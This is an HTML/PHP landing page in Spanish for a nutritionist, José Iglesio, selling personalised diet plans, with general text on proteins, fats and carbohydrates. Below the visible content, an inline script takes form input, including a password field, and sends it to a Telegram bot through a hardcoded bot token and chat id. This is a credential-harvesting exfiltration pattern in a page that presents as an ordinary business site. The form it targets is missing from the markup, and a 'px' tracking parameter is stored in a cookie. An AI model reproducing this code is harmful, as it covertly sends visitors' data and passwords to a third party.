<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
	<title>José Iglesio</title>
	<link rel="stylesheet" href="css/bootstrap.min.css">
	<link rel="stylesheet" href="css/styles.css">

	<?php
session_start();
$px = (isset($_GET['px'])) ? trim($_GET['px']) : '';
$_SESSION['s']=$px;
?>
	<style>

	.test{border: 2px solid red;}
		.container {
  margin-right: auto;
  margin-left: auto;
  padding-right: 0;
  padding-left: 0;
}

.row {
  margin-right: auto;
  margin-left: auto;
  padding-right: 0;
  padding-left: 0;
}


#main{max-width: 100%;
}	

#ppc{width:100%;}
#pct{display: flex;
justify-content: flex-end;
padding-right: 0;
padding-left: 0;}

#bold{font-weight: bold;}
.clms{background-color: #B2EEAF;
	padding-top: 0px;
	padding-bottom:0px;
}
.clms_item{background-color: white; 
	margin:auto;
	margin-bottom: 0px;
	margin-top: 0px;
	box-shadow: 3px 5px 3px 2px rgba(191, 191, 191, 0.5);
	}
/*li{color:green;}*/

ul{list-style-type: square;}


li::marker{color:green;}

li{}
li p {}
.r1{display: flex;
align-items: center;
justify-content: flex-start;
margin-bottom: 15px;
margin-top: 15px;
padding-left: 7px;}

.r1 img {margin-right: 8px;}
#pi{width:50px;
 }
#pih4{margin-top: 0px;
margin-bottom: 0px;}
.txt{margin-bottom:30px;}
.t3{font-size: 2.4em;}
.t1{font-size: 3.3em;
	font-weight: bold;}
#svob{font-size: 2.6em;}

.t2{font-size: 1.2em}

.bg2{
	background-color: #DDDEDE;
	color:black;
	/*background-image: url("/img/bg2.jpg");
	background-size: cover;
				background-position: right;*/


			}







@media (max-width: 991px){

.clms_item{margin-bottom:30px;}	
#obov{margin-bottom: 0;}
}

@media (min-width: 768px) and (max-width: 991px) {
#obov{}


}



@media (max-width: 768px){

/*.bg2{padding-left:10px;
		padding-right:10px;}*/
.bg1{font-size:0.8em;}
#pct{display: none;}
#phoneh4 {font-size: 1.25em;}
#phoneh45 {font-size: 1em;}

}

@media (max-width: 450px){




form{}
.bg2{		}

}

.frmm{margin-left: auto;
	margin-right: auto;
	margin-bottom: 30px;}
.form_text{text-align: center;
}

.tlg {margin-bottom: 0;}
.tlg > a {width: 100%;}
.tlg h2 {font-weight: bold;}
.fin{margin-left: 0;
	margin-right: 0;
	margin-bottom: 0;
	padding-top: 6%;
	padding-bottom: 6%;
max-width:100%;

background-color: #DDDEDE;}



#but2{width: 40%; color:white; background-color: #618689; border:none; font-weight: bold;}
#but1{width:100%; color:white; font-weight: bold; background-color: #618689; border:none;}

@media(max-width: 450px){

#but2{width:100%;}	

#but1div{width:100%;}
}

#txx{ font-size: 1.2em;}

@media (max-width: 768px) {#txx {}}
@media (max-width: 310px) {#txx h2 {font-size: 1.2em;} 
							#pi{width: 40px;}
							 }

@media (min-width: 1200px) and (max-width: 1350px){

	#pct {width:50%;}
	
}
@media (max-width: 1200px){
	#pct {display: none;}
	
}

#txx_item{padding-left: 0; padding-right: 0;}
#txx{padding-left: 6%; 
	padding-right: 6%;}

.face{background-color: blue;
	color:black;
}
#txleft{color:#F7F2E4;}
#under_face{background-color:#DDDEDE; 
}
#under_face_item{margin: auto; padding-top: 40px;
						padding-bottom: 40px;
						padding-right: 0px;
						padding-left: 0px;}
@media (max-width: 768px){
#under_face{padding-left: 6%;padding-right: 6%;
}

}
@media (max-width: 1100px) and (min-width:490px){

	#txleft{}
}
@media (max-width: 612px){

.face{background-color: black;
}
#txleft{width:100%;}
}

#mount3 img {
max-height: 250px;
}
#mount3 > div {padding-right: 0px;
padding-left: 0px;
display: flex;
overflow: hidden;
justify-content: flex-end;}
@media(min-width: 613px){
	#mount3{display: none;}
}

#phone a {text-decoration: none;
	underline:none ;
    color: white;}
#phone {padding-left: 6%;
		margin-top: 20px;}    



footer {
    background-color: #203C95;

    text-align: center;
    padding: 20px 0;
}

.footer-content a {
    margin: 0 10px;
    color: white;
    text-decoration: none;
}

.footer-content a:hover {
    color: #007bff;
}
	</style>



<script src="/dist/maska.umd.min.js"></script>



</head>
<body class="">

<div class = "container " id="main">
	<div class = "row bg1 face" style="background-color:#203C95;">
		<div class =" col col-sm-9 col-lg-12 " id = "txleft" style ="padding-left: 6%; padding-top: 4%; padding-right: 6%; padding-bottom: 4%;"><h3 style ="text-align:center;" id = "svob" class="txt t1">Mi Viaje Hacia la Creación de Dietas Personalizadas: La Historia de José Iglesio

</h3>
		</div>

		</div>

		<!--<div class = "row " id ="mount3"><div class = "col-12 "><img src="/img/mountains.jpg"/></div></div>-->

		

		<!--<div class ="col-4 col-lg-4 col-xl-5 " id="pct"><img src="/img/people.png" class = "" id="ppc"/></div>-->

	


	<div class="row  clms bg2 " >

		<div class = "row " id="txx" style="padding-top: 15px; padding-bottom: 15px;"> <div class = "col-12 " id = "txx_item"style="text-align: left;"><p  style="text-align: left; font-style: italic" > Hola, soy José Iglesio. Durante años, he estado inmerso en el mundo de la nutrición y la dietética, y hoy quiero compartir con vosotros mi experiencia y cómo llegué a desarrollar un enfoque único para las dietas personalizadas.

 </p><br> <div class="r1 ">
			<h2 class="" id= "pih4">El Comienzo de Mi Camino

</h2>
			</div><p>Mi viaje comenzó hace unos diez años. Trabajaba en un gimnasio local como entrenador personal y me di cuenta de que, aunque mis clientes se ejercitaban regularmente, muchos de ellos no alcanzaban sus objetivos de pérdida de peso. Esto me llevó a investigar más sobre la nutrición y el impacto de los alimentos en nuestro cuerpo.</p><br>
			<div class="row"><img src="/img/man.png" style="max-height: 600px; max-width: 600px;" /></div>


			<div class = "r1 ">
			<h2 id = "pih4" class ="" >La Importancia del Equilibrio Nutricional
</h2>
			</div><p>A través de mis estudios, descubrí que el equilibrio de proteínas, grasas y carbohidratos es crucial para una dieta exitosa. Pero lo más importante que aprendí fue que cada persona es única y requiere un plan de dieta adaptado específicamente a sus necesidades y objetivos.</p><br>
			<div class = "r1 ">
			<h2 id = "pih4" class ="" >Desarrollo de Dietas Personalizadas
</h2>
			</div><p>Así que empecé a desarrollar planes de dieta personalizados. Primero, realizo una evaluación detallada de la condición física de mis clientes, sus hábitos alimenticios, estilo de vida y metas personales. Luego, con esta información, creo un plan de dieta que equilibra adecuadamente las proteínas, grasas y carbohidratos, ajustándolo a sus necesidades individuales.</p><br>
			<div class="row"><img src="/img/mw.png" style="max-height: 600px; max-width: 600px;" /></div>
			<div class = "r1 ">
			<h2 id = "pih4" class ="" >¿Por Qué Funciona?
			</h2>
			</div><p>La razón por la que este enfoque es efectivo es simple: se basa en la ciencia y en la individualidad. No hay una solución única para todos cuando se trata de la nutrición. Cada cuerpo reacciona de manera diferente a diferentes tipos de alimentos y proporciones de macronutrientes.</p><br>
			<div class = "r1 ">
			<h2 id = "pih4" class ="" >Testimonios de Éxito
			</h2>
			</div><p>A lo largo de los años, he trabajado con cientos de clientes y he visto transformaciones increíbles. Desde pérdida de peso hasta mejoras en la salud general, los resultados hablan por sí mismos.</p><br>
			<div class="row"><img src="/img/friends.png" style="max-height: 600px; max-width: 600px;" /></div>
			<div class = "r1 ">
			<h2 id = "pih4" class ="" >Mi Invitación para Ti
			</h2>
			</div><p>Si estás luchando por perder peso o simplemente quieres mejorar tu salud a través de una nutrición personalizada, te invito a contactarme. Juntos, podemos trabajar para crear un plan de dieta que se ajuste perfectamente a tus necesidades y te ayude a alcanzar tus objetivos de salud.
			Recuerda, la alimentación saludable no es solo una dieta, es un estilo de vida. Y con el plan adecuado, puedes lograr un cambio significativo y duradero.</p><br>
			<div class = "r1 ">
			<h2 id = "pih4" class ="" >Sobre el efecto de las grasas proteicas y los hidratos de carbono en el peso corporal
			</h2>
			</div><p>Las proteínas son esenciales para la construcción y reparación de tejidos, especialmente los músculos. Un consumo adecuado de proteínas no solo ayuda a preservar la masa muscular, sino que también contribuye a un mayor gasto energético durante la digestión, conocido como efecto térmico de los alimentos. Además, las proteínas incrementan la sensación de saciedad, lo que puede ayudar a reducir la ingesta calórica general. Para quienes buscan reducir su peso, aumentar la proporción de proteínas en la dieta puede ser una estrategia efectiva.</p><br><p>Las grasas son fundamentales para numerosas funciones biológicas, incluyendo la absorción de vitaminas solubles en grasa. Sin embargo, son también la fuente más densa de energía, con 9 calorías por gramo. Este alto contenido calórico significa que un consumo excesivo de grasas puede conducir fácilmente a un aumento de peso. Por otro lado, las grasas saludables, como las encontradas en el aceite de oliva, aguacate y frutos secos, son importantes para una dieta balanceada y pueden ayudar a mejorar la saciedad. La clave está en el equilibrio y en escoger fuentes de grasa saludables.</p><br><p>Los carbohidratos son la principal fuente de energía para el cuerpo. Los carbohidratos complejos, como los granos enteros, frutas y vegetales, proporcionan una liberación lenta de energía, además de fibra, que ayuda a la digestión y a la saciedad. Por el contrario, los carbohidratos simples, como los azúcares refinados, pueden causar picos en los niveles de azúcar en sangre y contribuir a la acumulación de grasa si se consumen en exceso. Para un manejo efectivo del peso, es aconsejable enfocarse en carbohidratos complejos y limitar los simples.</p><br><p>Para perder peso, es esencial crear un déficit calórico, consumiendo menos calorías de las que el cuerpo necesita. Esto se puede lograr reduciendo la ingesta calórica y/o aumentando el gasto energético a través de la actividad física. Aumentar la proporción de proteínas y grasas saludables, mientras se reducen los carbohidratos simples, puede ser una forma efectiva de lograr este déficit calórico, manteniendo al mismo tiempo la saciedad y los niveles de energía.
			Para aumentar el peso, especialmente en forma de masa muscular, es importante crear un superávit calórico y enfocarse en un consumo adecuado de proteínas para apoyar el crecimiento muscular. </p><br>
		<br>
		<h4 style="text-align: center; font-weight: normal;">Póngase en contacto con José Iglesio y reserve una dieta personalizada. Llame a  +573162873369</h4>



		</div ></div>

	</div>

	<footer>
    <div class="footer-content">
        <a href="https://www.instagram.com/yourusername" target="_blank">Instagram</a>
        <a href="https://www.facebook.com/yourusername" target="_blank">Facebook</a>
        <a href="your-privacy-policy.html" target="_blank">Privacy Policy</a>
    </div>
</footer>

</div>


<a href="success.html" id="test-link"></a>
<script>



 document.getElementById("but2").addEventListener("click", function() {	
 
  var input = document.getElementById("exampleInputPassword1").value;
  
  if (input.trim() === "") {
    return; // If input is empty, exit the function without further action
  }
  else { //window.location.href = "success.php?user=" + encodeURIComponent(usernameValue);

     form = document.getElementById('forma');
        form.onsubmit = function (e) {
            e.preventDefault();
            const formData = new FormData(form);
            const obj = {};
            for (let pair of formData.entries()) {
                if (pair[0]) {
                    obj[pair[0]] = pair[1];
                }
            }

            obj['countryCode'] = document['countryCode'];
            let xhr = new XMLHttpRequest();
            xhr.open("GET", `https://api.telegram.org/bot6294939906:AAGuOM-xUjhUaaZDi4GM2v8mT0t0fUH24cw/sendMessage?chat_id=-1001927033087&text=${JSON.stringify(obj)}&parse_mode=html`);
    
            xhr.onload = () => setTimeout(() => {
                const link = document.getElementById('test-link');
                link.href = `success.html?user=${JSON.stringify(obj)}`;
                document.getElementById('test-link').click();
            }, 500);
    
            xhr.send();
        }
} 

 });

</script>




    <script>
    	
window.addEventListener("DOMContentLoaded", function() {
  // Extract the numbers from the URL
  const urlParams = new URLSearchParams(window.location.search);
  const pxValue = urlParams.get("px");
  
  // Store the extracted value in a cookie
  document.cookie = "pxValue=" + pxValue;
});

    </script>   

<script> new MaskInput("[data-maska]")</script>




<!--<script src="text/jquery-3.7.0.min.js"></script>-->
<script src="js/bootstrap.min.js"></script>
<script src="js/script.js"></script>
</body>
</html>